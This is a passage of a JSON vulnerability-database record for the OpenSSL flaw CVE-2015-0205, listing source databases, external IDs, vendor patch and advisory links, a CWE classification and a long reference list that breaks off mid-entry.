v1\n\niD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X\nENFobdxQdJ+gVAiRe8Qf54A=\n=wyAg\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2015-0205" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "BID", "id": "71941" }, { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "130051" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-0205", "trust": 3.0 }, { "db": "JUNIPER", "id": "JSA10679", "trust": 1.4 }, { "db": "BID", "id": "71941", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-001010", "trust": 0.8 }, { "db": "VULMON", "id": "CVE-2015-0205", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129973", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133316", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137292", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132763", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137201", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130051", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "BID", "id": "71941" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "PACKETSTORM", "id": "129973" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "137292" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "id": "VAR-201501-0339", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.396927715 }, "last_update_date": "2024-07-23T21:04:37.270000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "Unauthenticated DH client certificate fix.", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/1421e0c584ae9120ca1b88098f13d6d2e90b83a3" }, { "title": "HPSBMU03396", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "title": "HPSBMU03397", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "title": "HPSBMU03409", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "title": "HPSBMU03413", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "title": "HPSBMU03380", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04602055" }, { "title": "HPSBMU03611", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "title": "HPSBMU03612", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "DH client certificates accepted without verification [Server] (CVE-2015-0205)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2015-0205", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-0205" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Tenable Security Advisories: [R7] OpenSSL \u002720150108\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-03" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "JPN_RIC13351-2", "trust": 0.1, "url": "https://github.com/neominds/jpn_ric13351-2 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0205" }, { "db": "JVNDB", "id": "JVNDB-2015-001010" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-001010" }, { "db": "NVD", "id": "CVE-2015-0205" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/1421e0c584ae9120ca1b88098f13d6d2e90b83a3" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/147938.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-january/148363.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71941" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99708" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu98974537" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0205" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005170" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697291" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005150" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098358" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699052" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0205" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792" }, { "trust": 0.2, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.2, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-9.3.patch" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571\u003e" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20150108.txt\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.1.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:01.openssl.asc\u003e" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.0.patch" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:01/openssl-10.1.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5409" }, { "trust": 0.1, "url": "http://h20566.www2.hpe.com/hpsc/doc/public/display?calledby=search_result\u0026doc" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5413" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-20861d704bc04221a1518b7cb6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7995" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3237" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547" }, { 